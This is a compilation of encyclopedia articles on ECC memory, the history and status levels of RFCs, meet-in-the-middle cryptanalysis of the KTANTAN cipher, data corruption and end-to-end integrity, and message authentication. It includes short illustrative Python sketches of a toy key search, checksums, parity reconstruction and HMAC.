Filesystems such as ZFS or Btrfs, as well as some RAID implementations, support data scrubbing and resilvering, which allows bad blocks to be detected and (hopefully) recovered before they are used.[22] The recovered data may be re-written to exactly the same physical location, to spare blocks elsewhere on the same piece of hardware, or the data may be rewritten onto replacement hardware.

Dynamic random-access memory (DRAM) may provide stronger protection against soft errors by relying on error-correcting codes. Such error-correcting memory, known as ECC or EDAC-protected memory, is particularly desirable for mission-critical applications, such as scientific computing, financial, medical, etc., as well as extraterrestrial applications due to the increased radiation in space. Error-correcting memory controllers traditionally use Hamming codes, although some use triple modular redundancy. Interleaving allows distributing the effect of a single cosmic ray potentially upsetting multiple physically neighboring bits across multiple words by associating neighboring bits to different words. As long as a single-event upset (SEU) does not exceed the error threshold (e.g., a single error) in any particular word between accesses, it can be corrected (e.g., by a single-bit error-correcting code), and the illusion of an error-free memory system may be maintained.[23]

In addition to hardware providing features required for ECC memory to operate, operating systems usually contain related reporting facilities that are used to provide notifications when soft errors are transparently recovered. One example is the Linux kernel's EDAC subsystem (previously known as Bluesmoke), which collects the data from error-checking-enabled components inside a computer system; besides collecting and reporting back the events related to ECC memory, it also supports other checksumming errors, including those detected on the PCI bus.[24][25][26] A few systems also support memory scrubbing to catch and correct errors early before they become unrecoverable.
https://en.wikipedia.org/wiki/Error_detection_and_correction
A Request for Comments (RFC) is a publication in a series from the principal technical development and standards-setting bodies for the Internet, most prominently the Internet Engineering Task Force (IETF).[1][2] An RFC is authored by individuals or groups of engineers and computer scientists in the form of a memorandum describing methods, behaviors, research, or innovations applicable to the working of the Internet and Internet-connected systems. It is submitted either for peer review or to convey new concepts, information, or, occasionally, engineering humor.[3]

The IETF adopts some of the proposals published as RFCs as Internet Standards. However, many RFCs are informational or experimental in nature and are not standards.[4] The RFC system was invented by Steve Crocker in 1969 to help record unofficial notes on the development of ARPANET. RFCs have since become official documents of Internet specifications, communications protocols, procedures, and events.[5] According to Crocker, the documents "shape the Internet's inner workings and have played a significant role in its success," but are not widely known outside the community.[6]

Outside of the Internet community, other documents also called requests for comments have been published, as in U.S. Federal government work, such as by the National Highway Traffic Safety Administration.[7]

The inception of the RFC format occurred in 1969 as part of the seminal ARPANET project.[6] Today, it is the official publication channel for the Internet Engineering Task Force (IETF), the Internet Architecture Board (IAB), and – to some extent – the global community of computer network researchers in general.

The authors of the first RFCs typewrote their work and circulated hard copies among the ARPA researchers. Unlike the modern RFCs, many of the early RFCs were actual Requests for Comments and were titled as such to avoid sounding too declarative and to encourage discussion.[8][9] The RFC leaves questions open and is written in a less formal style. This less formal style is now typical of Internet Draft documents, the precursor step before being approved as an RFC.

In December 1969, researchers began distributing new RFCs via the newly operational ARPANET. RFC 1, titled "Host Software", was written by Steve Crocker of the University of California, Los Angeles (UCLA), and published on April 7, 1969.[10] Although written by Steve Crocker, the RFC had emerged from an early working group discussion between Steve Crocker, Steve Carr, and Jeff Rulifson. In RFC 3, which first defined the RFC series, Crocker started attributing the RFC series to the Network Working Group. Rather than being a formal committee, it was a loose association of researchers interested in the ARPANET project. In effect, it included anyone who wanted to join the meetings and discussions about the project.

Many of the subsequent RFCs of the 1970s also came from UCLA, because UCLA hosted one of the first Interface Message Processors (IMPs) on ARPANET. The Augmentation Research Center (ARC) at Stanford Research Institute, directed by Douglas Engelbart, hosted another of the first four ARPANET nodes and was the source of early RFCs. The ARC became the first network information center (InterNIC), which was managed by Elizabeth J. Feinler to distribute the RFCs along with other network information.[11]

On April Fools' Day 1978, RFC 748 was published as a parody of the TCP/IP documentation style. This resumed in 1989 with the publication of RFC 1097, which describes an option for telnet clients to display subliminal messages.
Subsequent April Fools' Day RFCs have been published annually since then, notably RFC 2324, which describes the Hyper Text Coffee Pot Control Protocol and defines the HTTP 418 "I'm a teapot" status. Humorous RFCs date back to RFC 439, published in January 1973.

From 1969 until 1998, Jon Postel served as the RFC editor. On his death in 1998, his obituary was published as RFC 2468.[12] Following the expiration of the original ARPANET contract with the U.S. federal government, the Internet Society, acting on behalf of the IETF, contracted with the Networking Division of the University of Southern California (USC) Information Sciences Institute (ISI) to assume the editorship and publishing responsibilities under the direction of the IAB. Sandy Ginoza joined USC/ISI in 1999 to work on RFC editing, and Alice Hagens in 2005.[13] Bob Braden took over the role of RFC project lead, while Joyce K. Reynolds continued to be part of the team until October 13, 2006.

In July 2007, streams of RFCs were defined, so that the editing duties could be divided. IETF documents came from IETF working groups or submissions sponsored by an IETF area director from the Internet Engineering Steering Group. The IAB can publish its own documents. A research stream of documents comes from the Internet Research Task Force (IRTF), and an independent stream from other outside sources.[14] A new model was proposed in 2008, refined, and published in August 2009, splitting the task into several roles,[15] including the RFC Series Advisory Group (RSAG). The model was updated in 2012[16] and 2020.[17] The streams were also refined in December 2009, with standards defined for their style.[18] In January 2010, the RFC Editor function was moved to a contractor, Association Management Solutions, with Glenn Kowack serving as interim series editor.[19] In late 2011, Heather Flanagan was hired as the permanent RFC Series Editor (RSE). Also at that time, an RFC Series Oversight Committee (RSOC) was created.[20]

In 2020, the IAB convened the RFC Editor Future Development program to discuss potential changes to the RFC Editor model. The results of the program were included in the RFC Editor Model (Version 3) as defined in RFC 9280, published in June 2022.[1] Generally, the new model is intended to clarify responsibilities and processes for defining and implementing policies related to the RFC series and the RFC Editor function. Changes in the new model included establishing the position of the RFC Consulting Editor, the RFC Series Working Group (RSWG), and the RFC Series Approval Board (RSAB). It also established a new Editorial Stream for the RFC series and concluded the RSOC. The role of the RSE was changed to the RFC Series Consulting Editor (RSCE). In September 2022, Alexis Rossi was appointed to that position.[21]

Requests for Comments were originally produced in non-reflowable text format. In August 2019, the format was changed so that new documents can be viewed optimally in devices with varying display sizes.[22]

The RFC Editor assigns each RFC a serial number. Once assigned a number and published, an RFC is never rescinded or modified; if the document requires amendments, the authors publish a revised document. Therefore, some RFCs supersede others; the superseded RFCs are said to be deprecated, obsolete, or obsoleted by the superseding RFC. Together, the serialized RFCs compose a continuous historical record of the evolution of Internet standards and practices.
The RFC process is documented in RFC 2026 (The Internet Standards Process, Revision 3).[23] The RFC production process differs from the standardization process of formal standards organizations such as the International Organization for Standardization (ISO). Internet technology experts may submit an Internet Draft without support from an external institution. Standards-track RFCs are published with approval from the IETF, and are usually produced by experts participating in IETF Working Groups, which first publish an Internet Draft. This approach facilitates initial rounds of peer review before documents mature into RFCs.[24] The RFC tradition of pragmatic, experience-driven, after-the-fact standards authorship accomplished by individuals or small working groups can have important advantages over the more formal, committee-driven process typical of ISO and national standards bodies.[25]

Most RFCs use a common set of terms such as "MUST" and "NOT RECOMMENDED" (as defined by RFC 2119 and RFC 8174), augmented Backus–Naur form (ABNF) (RFC 5234) as a meta-language, and simple text-based formatting, in order to keep the RFCs consistent and easy to understand.[23]

The RFC series contains three sub-series for IETF RFCs: BCP, FYI, and STD. Best Current Practice (BCP) is a sub-series of mandatory IETF RFCs not on the standards track. For Your Information (FYI) is a sub-series of informational RFCs promoted by the IETF as specified in RFC 1150 (FYI 1). In 2011, RFC 6360 obsoleted FYI 1 and concluded this sub-series. Standard (STD) used to be the third and highest maturity level of the IETF standards track specified in RFC 2026 (BCP 9). In 2011, RFC 6410 (a new part of BCP 9) reduced the standards track to two maturity levels.

There are five streams of RFCs: IETF, IRTF, IAB, independent submission,[26] and Editorial. Only the IETF creates BCPs and RFCs on the standards track. The IAB publishes informational documents relating to policy or architecture. The IRTF publishes the results of research, either as informational documents or as experiments. Independent submissions are published at the discretion of the Independent Submissions Editor. Non-IETF documents are reviewed by the IESG for conflicts with IETF work. IRTF and independent RFCs generally contain relevant information or experiments for the Internet at large not in conflict with IETF work; compare RFC 4846, RFC 5742 and RFC 5744.[27][28] The Editorial Stream is used to effect editorial policy changes across the RFC series (see RFC 9280).[1]

The official source for RFCs on the World Wide Web is the RFC Datatracker. Almost any published RFC can be retrieved via a URL of the form https://datatracker.ietf.org/doc/html/rfc5000, shown for RFC 5000. Every RFC is submitted as plain ASCII text and is published in that form, but may also be available in other formats. For easy access to the metadata of an RFC, including abstract, keywords, author(s), publication date, errata, status, and especially later updates, the RFC Editor site offers a search form with many features. A redirection sets some efficient parameters, for example: rfc:5000.[4] The official International Standard Serial Number (ISSN) of the RFC series is 2070-1721.[18]

Not all RFCs are standards.[29] Each RFC is assigned a designation with regard to status within the Internet standardization process. This status is one of the following: Informational, Experimental, Best Current Practice, Standards Track, or Historic.[30] Once submitted, accepted, and published, an RFC cannot be changed.
Errata may be submitted, which are published separately. More significant changes require a new submission, which will receive a new serial number.[31]

Standards-track documents are further divided into Proposed Standard and Internet Standard documents.[32] Only the IETF, represented by the Internet Engineering Steering Group (IESG), can approve standards-track RFCs. If an RFC becomes an Internet Standard (STD), it is assigned an STD number but retains its RFC number. The definitive list of Internet Standards is the Official Internet Protocol Standards. Previously, STD 1 used to maintain a snapshot of the list.[33]

When an Internet Standard is updated, its STD number stays the same, now referring to a new RFC or set of RFCs. A given Internet Standard, STD n, may be RFCs x and y at a given time, but later the same standard may be updated to be RFC z instead. For example, in 2007 RFC 3700 was an Internet Standard – STD 1 – and in May 2008 it was replaced with RFC 5000, so RFC 3700 changed to Historic, RFC 5000 became an Internet Standard, and as of May 2008 STD 1 was RFC 5000. As of December 2013, RFC 5000 was replaced by RFC 7100, updating RFC 2026 to no longer use STD 1. (Best Current Practices work in a similar fashion; BCP n refers to a certain RFC or set of RFCs, but which RFC or RFCs may change over time.)

An informational RFC can be nearly anything from April 1 jokes to widely recognized essential RFCs like Domain Name System Structure and Delegation (RFC 1591). Some informational RFCs formed the FYI sub-series.

An experimental RFC can be an IETF document or an individual submission to the RFC Editor. A draft is designated experimental if it is unclear whether the proposal will work as intended or whether it will be widely adopted. An experimental RFC may be promoted to the standards track if it becomes popular and works well.[34]

The Best Current Practice subseries collects administrative documents and other texts which are considered official rules and not only informational, but which do not affect over-the-wire data. The border between the standards track and BCP is often unclear. If a document only affects the Internet Standards Process, like BCP 9,[35] or IETF administration, it is clearly a BCP. If it only defines rules and regulations for Internet Assigned Numbers Authority (IANA) registries it is less clear; most of these documents are BCPs, but some are on the standards track. The BCP series also covers technical recommendations for how to practice Internet standards; for instance, the recommendation to use source filtering to make DoS attacks more difficult (RFC 2827: "Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing") is BCP 38.

A historic RFC is one whose technology is no longer recommended for use, which differs from the "Obsoletes" header in a replacement RFC. For example, RFC 821 (SMTP) is itself obsoleted by various newer RFCs, but SMTP itself is still "current technology", so it is not in Historic status.[36] However, since BGP version 4 has entirely superseded earlier BGP versions, the RFCs describing those earlier versions, such as RFC 1267, have been designated historic.

Status unknown is used for some very old RFCs, where it is unclear which status the document would get if it were published today.
Some of these RFCs would not be published at all today; an early RFC was often just that: a simple Request for Comments, not intended to specify a protocol, administrative procedure, or anything else for which the RFC series is used today.[37]

The general rule is that original authors (or their employers, if their employment conditions so stipulate) retain copyright unless they make an explicit transfer of their rights.[38] An independent body, the IETF Trust, holds the copyright for some RFCs; for all others, it is granted a license by the authors that allows it to reproduce RFCs.[39] The Internet Society is referenced on many RFCs prior to RFC 4714 as the copyright owner, but it transferred its rights to the IETF Trust.[40]
https://en.wikipedia.org/wiki/RFC_(identifier)
The 3-subset meet-in-the-middle (hereafter shortened MITM) attack is a variant of the generic meet-in-the-middle attack, which is used in cryptology for hash and block cipher cryptanalysis. The 3-subset variant opens up the possibility of applying MITM attacks to ciphers where it is not trivial to divide the key bits into two independent key-spaces, as required by the MITM attack. The 3-subset variant relaxes the restriction that the key-spaces be independent by moving the intersecting parts of the key-spaces into a third subset, which contains the key bits common to the two key-spaces.

The original MITM attack was first suggested in an article by Diffie and Hellman in 1977, where they discussed the cryptanalytic properties of DES.[1] They argued that the key size of DES was too small, and that reapplying DES multiple times with different keys could be a solution; however, they advised against double-DES and suggested triple-DES as a minimum, due to MITM attacks. Double-DES is very susceptible to a MITM attack, as DES can easily be split into two subciphers (the first and second DES encryption) with keys independent of one another, allowing a basic MITM attack that reduces the computational complexity from 2^112 (= 2^(2×56)) to 2^57 (= 2 × 2^56). Many variations have emerged since Diffie and Hellman suggested MITM attacks. These variations either make MITM attacks more effective or allow them to be used in situations where the basic variant cannot. The 3-subset variant was shown by Bogdanov and Rechberger in 2011,[2] and has shown its use in the cryptanalysis of ciphers such as the lightweight block-cipher family KTANTAN.

As with general MITM attacks, the attack is split into two phases: a key-reducing phase and a key-verification phase. In the first phase, the domain of key candidates is reduced by applying the MITM attack. In the second phase, the found key candidates are tested on another plain-/ciphertext pair to filter away the wrong key(s).

In the key-reducing phase, the attacked cipher is split into two subciphers, f and g, each with its own key bits, as is normal with MITM attacks. Instead of having to conform to the limitation that the key bits of the two subciphers should be independent, the 3-subset attack allows splitting the cipher into two subciphers where some of the bits are allowed to be used in both. This is done by splitting the key into three subsets: the key bits used only by f, the key bits used only by g, and the key bits shared by both subciphers.

To now carry out the MITM attack, the three subsets are brute-forced individually, according to the following procedure: (1.1) guess a value for the common key bits; (1.2) for each guess, brute-force the f-only bits, computing the intermediate value i forward from the plaintext and storing the results, then brute-force the g-only bits, computing the intermediate value j backward from the ciphertext; (1.3) compare the values of i and j, and keep each combination that matches as a key candidate.

Each key candidate found in the key-reducing phase is then tested with another plain-/ciphertext pair. This is done simply by seeing if the encryption of the plaintext P yields the known ciphertext C. Usually only a few other pairs are needed here, which gives the 3-subset MITM attack a very low data complexity. A toy sketch of the two phases appears at the end of this article, after the KTANTAN example.

The following example is based on the attack done by Rechberger and Bogdanov on the KTANTAN cipher family. The naming conventions used in their paper are also used for this example. The attack reduces the computational complexity of KTANTAN32 to 2^75.170, down from 2^80 for a brute-force attack. A computational complexity of 2^75.170 is, as of 2014, still not practical to break, and the attack is thus not computationally feasible as of now.
The same goes for KTANTAN48 and KTANTAN64, whose complexities can be seen at the end of the example. The attack is possible due to weaknesses exploited in KTANTAN's bit-wise key schedule. It is applicable to KTANTAN32, KTANTAN48 and KTANTAN64, since all the variants use the same key schedule. It is not applicable to the related KATAN family of block ciphers, due to the differences in the key schedule between KTANTAN and KATAN.

KTANTAN is a lightweight block cipher, meant for constrained platforms such as RFID tags, where a cryptographic primitive such as AES would be either impossible (given the hardware) or too expensive to implement. It was invented by De Cannière, Dunkelman and Knežević in 2009.[3] It takes a block size of either 32, 48 or 64 bits, and encrypts it using an 80-bit key over 254 rounds. Each round utilizes two bits of the key (selected by the key schedule) as the round key.

In preparation for the attack, weaknesses in the key schedule of KTANTAN that allow the 3-subset MITM attack were identified. Since only two key bits are used each round, the diffusion of the key per round is small; the safety lies in the number of rounds. Due to this structure of the key schedule, it was possible to find long stretches of consecutive rounds in which certain key bits are never used. This characteristic of the key schedule is what allows staging the 3-subset MITM attack, since the cipher can be split into two blocks with independent key bits, fixing the parameters of the attack.

One may notice a problem with step 1.3 in the key-reducing phase: it is not possible to directly compare the values of i and j, as i is calculated at the end of round 111 and j is calculated at the start of round 131. This is mitigated by another MITM technique called partial matching. The authors found, by calculating forwards from the intermediate value i and backwards from the intermediate value j, that at round 127, 8 bits were still unchanged in both i and j with probability one. They thus compared only part of the state, namely those 8 bits (it was 8 bits at round 127 for KTANTAN32; it was 10 bits at round 123 and 47 bits at round 131 for KTANTAN48 and KTANTAN64, respectively). Doing this yields more false positives, but nothing that increases the complexity of the attack noticeably. KTANTAN32 now requires on average 2 pairs to find the key candidate, due to the false positives from matching only on part of the state of the intermediate values. KTANTAN48 and KTANTAN64 on average still require only one plain-/ciphertext pair to test and find the correct key candidates.

The results are taken from the article by Rechberger and Bogdanov. This is no longer the best attack on KTANTAN. The best attack as of 2011 is due to Wei, Rechberger, Guo, Wu, Wang and Ling, who improved upon the MITM attack on the KTANTAN family.[4] They arrived at a computational complexity of 2^72.9 with 4 chosen plain-/ciphertext pairs, using indirect partial-matching and splice-and-cut MITM techniques.
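To illustrate the two phases on something runnable, here is the toy 3-subset MITM sketch referred to above. The 6-bit "cipher" (f, g_enc, and a key split into common bits a0, f-only bits a1, and g-only bits a2) is entirely invented for the demonstration and has nothing to do with KTANTAN; it only shows the mechanics of the key-reducing and key-verification phases.

```python
# Toy 3-subset MITM: subcipher f uses key bits (a0, a1); subcipher g
# uses key bits (a0, a2). Each subset is 2 bits here, so everything is
# enumerable; the structure mirrors the procedure described above.

def f(block, a0, a1):              # first half, computed forward from the plaintext
    return ((block ^ a0) * 5 + a1) % 256

def g_enc(block, a0, a2):          # second half
    return ((block + a2) % 256) ^ (a0 * 3)

def g_dec(block, a0, a2):          # inverse of g_enc, computed backward from the ciphertext
    return ((block ^ (a0 * 3)) - a2) % 256

def encrypt(p, a0, a1, a2):
    return g_enc(f(p, a0, a1), a0, a2)

secret = (2, 1, 3)                 # the unknown key (a0, a1, a2)
pairs = [(p, encrypt(p, *secret)) for p in (17, 99)]   # two known plain-/ciphertext pairs

# Key-reducing phase (steps 1.1-1.3):
candidates = []
p0, c0 = pairs[0]
for a0 in range(4):                                    # 1.1: guess the common subset
    table = {f(p0, a0, a1): a1 for a1 in range(4)}     # 1.2: forward over A1, store i
    for a2 in range(4):                                # 1.2: backward over A2, compute j
        j = g_dec(c0, a0, a2)
        if j in table:                                 # 1.3: i == j -> key candidate
            candidates.append((a0, table[j], a2))

# Key-verification phase: test the candidates on a second pair.
survivors = [k for k in candidates if encrypt(pairs[1][0], *k) == pairs[1][1]]
assert secret in survivors
print(survivors)
```

The design choice to brute-force the common bits in the outer loop is what distinguishes the 3-subset variant: for each guess of the shared bits, the inner search is an ordinary two-subset MITM.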
https://en.wikipedia.org/wiki/3-subset_meet-in-the-middle_attack
Partial matching is a technique that can be used with a MITM attack. Partial matching is where the intermediate values of the MITM attack, i and j, computed from the plaintext and ciphertext respectively, are matched on only a few select bits, instead of on the complete state.

A limitation of MITM attacks is the number of intermediate values that need to be stored. In order to compare the intermediate values i and j, all i's need to be computed and stored first, before each computed j can be compared against them. If the two subciphers identified by the MITM attack both have a sufficiently large subkey, then an infeasible number of intermediate values needs to be stored. While there are techniques such as cycle detection algorithms[1] that allow one to perform a MITM attack without storing either all values of i or all values of j, these techniques require that the subciphers of the MITM attack be symmetric. Partial matching is thus a solution that allows one to perform a MITM attack in a situation where the subkeys have a cardinality just large enough to make the number of temporary values that need to be stored infeasible. While this allows one to store more temporary values, its use is still limited, as it only allows one to perform a MITM attack on a subcipher with a few more key bits. As an example: if only 1/8 of each intermediate value is stored, then the subkey needs to be only 3 bits larger before the same amount of memory is required anyway, since 2^(−3) = 1/8.

A feature provided by partial matching that is in most cases far more useful is the ability to compare intermediate values computed at different rounds of the attacked cipher. If the diffusion in each round of the cipher is low enough, it might be possible over a span of rounds to find bits in the intermediate states that have not changed with probability 1. These bits in the intermediate states can still be compared.

The disadvantage of both of these uses is that there will be more false positives among the key candidates, which need to be tested. As a rule, the chance of a false positive is given by the probability 2^(−|i|), where |i| is the number of matched bits.

For a step-by-step example of the complete attack on KTANTAN,[2] see the example on the 3-subset MITM page; this example only deals with the part that needs partial matching. What is useful to know is that KTANTAN is a 254-round block cipher, where each round uses 2 bits of the 80-bit key.

In the 3-subset attack on the KTANTAN family of ciphers, it was necessary to utilize partial matching in order to stage the attack. Partial matching was needed because the intermediate values of the plain- and ciphertext in the MITM attack were computed at the end of round 111 and at the start of round 131, respectively. Since they had a span of 20 rounds between them, they could not be compared directly. The authors of the attack, however, identified some useful characteristics of KTANTAN that held with probability 1. Due to the low diffusion per round in KTANTAN (the security is in the number of rounds), they found, by computing forwards from round 111 and backwards from round 131, that at round 127, 8 bits from both intermediate states would remain unchanged. (It was 8 bits at round 127 for KTANTAN32; it was 10 bits at round 123 and 47 bits at round 131 for KTANTAN48 and KTANTAN64, respectively.)
By comparing only those 8 bits of each intermediate value, the authors were able to orchestrate a MITM attack on the cipher, despite there being 20 rounds between the two subciphers. Using partial matching increased the number of false positives, but nothing that noticeably increased the complexity of the attack.
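A small sketch of the false-positive behaviour of partial matching: comparing two unrelated intermediate values on only 8 bits produces a match with probability about 2^(−8), consistent with the rule above. The values below are random stand-ins, not outputs of a real cipher.

```python
import random

MASK_BITS = 8
MASK = (1 << MASK_BITS) - 1

def partial_match(i: int, j: int) -> bool:
    """Match the intermediate values on the low 8 bits only."""
    return (i & MASK) == (j & MASK)

random.seed(1)
trials = 100_000
false_hits = sum(
    partial_match(random.getrandbits(32), random.getrandbits(32))
    for _ in range(trials)
)
print(false_hits / trials)   # ~= 2^-8 ~= 0.0039: the false-positive rate per comparison
```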
https://en.wikipedia.org/wiki/Partial-matching_meet-in-the-middle_attack
Data corruption refers to errors in computer data that occur during writing, reading, storage, transmission, or processing, which introduce unintended changes to the original data. Computer, transmission, and storage systems use a number of measures to provide end-to-end data integrity, or lack of errors.

In general, when data corruption occurs, a file containing that data will produce unexpected results when accessed by the system or the related application. Results could range from a minor loss of data to a system crash. For example, if a document file is corrupted, when a person tries to open that file with a document editor they may get an error message; the file might not open at all, or might open with some of the data corrupted (or, in some cases, completely corrupted, leaving the document unintelligible). Some types of malware may intentionally corrupt files as part of their payloads, usually by overwriting them with inoperative or garbage code, while a non-malicious virus may also unintentionally corrupt files when it accesses them. If a virus or trojan with this payload method manages to alter files critical to the running of the computer's operating system software or physical hardware, the entire system may be rendered unusable. Some programs can offer to repair the file automatically after the error, while others cannot; it depends on the level of corruption and on the built-in capability of the application to handle the error. Corruption has various causes.

There are two types of data corruption associated with computer systems: undetected and detected. Undetected data corruption, also known as silent data corruption, results in the most dangerous errors, as there is no indication that the data is incorrect. Detected data corruption may be permanent with the loss of data, or may be temporary when some part of the system is able to detect and correct the error; in the latter case there is no data corruption. Data corruption can occur at any level in a system, from the host to the storage medium. Modern systems attempt to detect corruption at many layers and then recover or correct the corruption; this is almost always successful, but very rarely the information arriving in the system's memory is corrupted and can cause unpredictable results.

Data corruption during transmission has a variety of causes. Interruption of data transmission causes information loss. Environmental conditions can interfere with data transmission, especially when dealing with wireless transmission methods. Heavy clouds can block satellite transmissions. Wireless networks are susceptible to interference from devices such as microwave ovens.

Hardware and software failure are the two main causes of data loss. Background radiation, head crashes, and aging or wear of the storage device fall into the former category, while software failure typically occurs due to bugs in the code. Cosmic rays cause most soft errors in DRAM.[1] Some errors go unnoticed, without being detected by the disk firmware or the host operating system; these errors are known as silent data corruption.[2] There are many error sources beyond the disk storage subsystem itself: cables might be slightly loose, the power supply might be unreliable,[3] external vibrations such as a loud sound may occur,[4] the network might introduce undetected corruption,[5] and cosmic radiation and many other causes can lead to soft memory errors.
In an analysis of 39,000 storage systems, firmware bugs accounted for 5–10% of storage failures.[6] All in all, the error rates observed in a CERN study on silent corruption are far higher than one in every 10^16 bits.[7] The online retailer Amazon.com has acknowledged similarly high data corruption rates in its systems.[8] In 2021, faulty processor cores were identified as an additional cause in publications by Google and Facebook; cores were found to be faulty at a rate of several per thousands of cores.[9][10]

One problem is that hard disk drive capacities have increased substantially while their per-bit error rates have remained roughly unchanged. Old disks held so little data that the probability of any corruption on a given disk was very small; modern disks store vastly more data at the same per-bit error rate, so the probability that a given disk holds corrupted data is correspondingly larger. For this reason, silent data corruption was not a serious concern while storage devices remained relatively small and slow, but with the advent of larger drives and very fast RAID setups, users can transfer 10^16 bits in a reasonably short time and thus easily reach the data corruption thresholds.[11]

As an example, ZFS creator Jeff Bonwick stated that the fast database at Greenplum, a database software company specializing in large-scale data warehousing and analytics, faces silent corruption every 15 minutes.[12] As another example, a real-life study performed by NetApp on more than 1.5 million HDDs over 41 months found more than 400,000 silent data corruptions, of which more than 30,000 were not detected by the hardware RAID controller (they were only detected during scrubbing).[13] Another study, performed by CERN over six months and involving about 97 petabytes of data, found that about 128 megabytes of data became permanently and silently corrupted somewhere in the pathway from network to disk.[14]

Silent data corruption may result in cascading failures, in which the system may run for a period of time with an undetected initial error causing increasingly more problems until the corruption is ultimately detected.[15] For example, a failure affecting file system metadata can result in multiple files being partially damaged or made completely inaccessible as the file system is used in its corrupted state.

When data corruption behaves as a Poisson process, where each bit of data has an independently low probability of being changed, it can generally be detected by the use of checksums and can often be corrected by the use of error-correcting codes (ECC). If uncorrectable data corruption is detected, procedures such as automatic retransmission or restoration from backups can be applied. Certain RAID levels store and evaluate parity bits for data across a set of hard disks and can reconstruct corrupted data upon the failure of one or more disks, depending on the RAID level implemented. Some CPU architectures employ transparent checks to detect and mitigate data corruption in CPU caches, CPU buffers, and instruction pipelines; an example is Intel Instruction Replay technology, which is available on Intel Itanium processors.[16]

Many errors are detected and corrected by hard disk drives themselves, using the ECC codes[17] stored on disk for each sector.
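As a minimal sketch of checksum-based detection (illustrative only; real disk firmware and file systems use stronger codes such as per-sector ECC), the following Python fragment stores a CRC-32 alongside a block of data and verifies it on read; a mismatch reveals corruption, although a plain checksum cannot correct it:

    import zlib

    def write_block(data: bytes) -> tuple[bytes, int]:
        # Store the data together with a CRC-32 computed over it.
        return data, zlib.crc32(data)

    def read_block(data: bytes, stored_crc: int) -> bytes:
        # Recompute the checksum on read; a mismatch means the block
        # was altered somewhere between write and read.
        if zlib.crc32(data) != stored_crc:
            raise IOError("checksum mismatch: data corruption detected")
        return data

    block, crc = write_block(b"important payload")
    try:
        read_block(b"imp0rtant payload", crc)  # one corrupted byte
    except IOError as err:
        print(err)  # detected, but not corrected

Detection alone can only trigger recovery paths such as retransmission or restoring from backup; correction in place requires the redundancy of an ECC or parity scheme.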
If the disk drive detects multiple read errors on a sector, it may make a copy of the failing sector on another part of the disk by remapping the failed sector to a spare sector, without the involvement of the operating system (though this may be delayed until the next write to the sector). This "silent correction" can be monitored using S.M.A.R.T. and tools, available for most operating systems, that automatically check the disk drive for impending failures by watching for deteriorating SMART parameters.

Some file systems, such as Btrfs, HAMMER, ReFS, and ZFS, use internal data and metadata checksumming to detect silent data corruption. In addition, if corruption is detected and the file system uses integrated RAID mechanisms that provide data redundancy, such file systems can also reconstruct corrupted data in a transparent way.[18] This approach allows improved data integrity protection covering the entire data path, usually known as end-to-end data protection, in contrast with data integrity approaches that do not span the different layers of the storage stack and thus allow corruption to occur as data passes the boundaries between layers.[19]

Data scrubbing is another method to reduce the likelihood of data corruption, as disk errors are caught and recovered from before multiple errors accumulate and overwhelm the number of parity bits. Instead of parity being checked on each read, it is checked during a regular scan of the disk, often done as a low-priority background process. The "data scrubbing" operation activates a parity check; if a user simply runs a normal program that reads data from the disk, the parity is not checked unless parity-check-on-read is both supported and enabled on the disk subsystem.

If appropriate mechanisms are employed to detect and remedy data corruption, data integrity can be maintained. This is particularly important in commercial applications (e.g., banking), where an undetected error could corrupt a database index or change data in a way that drastically affects an account balance, and in the use of encrypted or compressed data, where a small error can make an extensive dataset unusable.[7]
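As a simplified stand-in for the parity-based reconstruction described above (an XOR parity block in the style of RAID 5; this is not the actual Btrfs or ZFS code), the following Python sketch rebuilds a lost block from the surviving blocks during a scrub-like pass:

    from functools import reduce

    def parity(blocks):
        # XOR equal-sized blocks together, byte by byte.
        return bytes(reduce(lambda a, b: a ^ b, column) for column in zip(*blocks))

    data = [b"AAAA", b"BBBB", b"CCCC"]  # equal-sized data blocks
    p = parity(data)                    # parity block stored alongside the data

    # Simulate losing data[1], then reconstruct it from the survivors
    # plus the parity block, as a scrub would after detecting the loss.
    rebuilt = parity([data[0], data[2], p])
    assert rebuilt == data[1]

The same XOR relation that produces the parity block also recovers any single missing block, which is why periodic scrubbing matters: it finds and repairs single failures before a second failure makes reconstruction impossible.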
https://en.wikipedia.org/wiki/End-to-end_data_integrity
In information security, message authentication or data origin authentication is a property indicating that a message has not been modified while in transit (data integrity) and that the receiving party can verify the source of the message.[1] Message authentication does not necessarily include the property of non-repudiation.[2][3]

Message authentication is typically achieved by using message authentication codes (MACs), authenticated encryption (AE), or digital signatures.[2] The message authentication code, also known as a digital authenticator, is used as an integrity check based on a secret key shared by two parties to authenticate information transmitted between them.[4] It is based on a cryptographic hash or a symmetric encryption algorithm.[5] The authentication key is shared by exactly two parties (e.g., communicating devices), and authentication will fail if a third party possesses the key, since the algorithm will no longer be able to detect forgeries (i.e., to validate the unique source of the message).[6] In addition, the key must be randomly generated, to avoid its recovery through brute-force searches and related-key attacks designed to identify it from the messages transiting the medium.[6]

Some cryptographers distinguish between "message authentication without secrecy" systems, which allow the intended receiver to verify the source of a message without hiding its plaintext contents, and authenticated encryption systems.[7] Some cryptographers have researched subliminal channel systems, which send messages that appear to use a "message authentication without secrecy" system but in fact also transmit a secret message.

Data origin authentication and non-repudiation have also been studied in the framework of quantum cryptography.[8][9]
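As a minimal sketch of a MAC in practice (using Python's standard hmac module; the hard-coded key is illustrative only and would normally come from a secure key-establishment step), the sender computes an HMAC-SHA256 tag with the shared secret key, and the receiver recomputes and compares it in constant time:

    import hashlib
    import hmac

    key = b"shared-secret-key"  # known only to the two communicating parties

    def tag(message: bytes) -> bytes:
        # Compute an HMAC-SHA256 tag over the message with the shared key.
        return hmac.new(key, message, hashlib.sha256).digest()

    def verify(message: bytes, received_tag: bytes) -> bool:
        # compare_digest avoids leaking timing information during comparison.
        return hmac.compare_digest(tag(message), received_tag)

    msg = b"transfer 100 to account 42"
    t = tag(msg)
    assert verify(msg, t)                                 # authentic message
    assert not verify(b"transfer 900 to account 42", t)  # forgery rejected

Note that this provides data origin authentication but not non-repudiation: either key holder could have produced the tag, so a digital signature is needed when the sender must be unable to deny authorship.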
https://en.wikipedia.org/wiki/Message_authentication
Committee on National Security Systems Instruction No. 4009, National Information Assurance Glossary, published by the United States federal government, is an unclassified glossary of information security terms intended to provide a common vocabulary for discussing information assurance concepts.

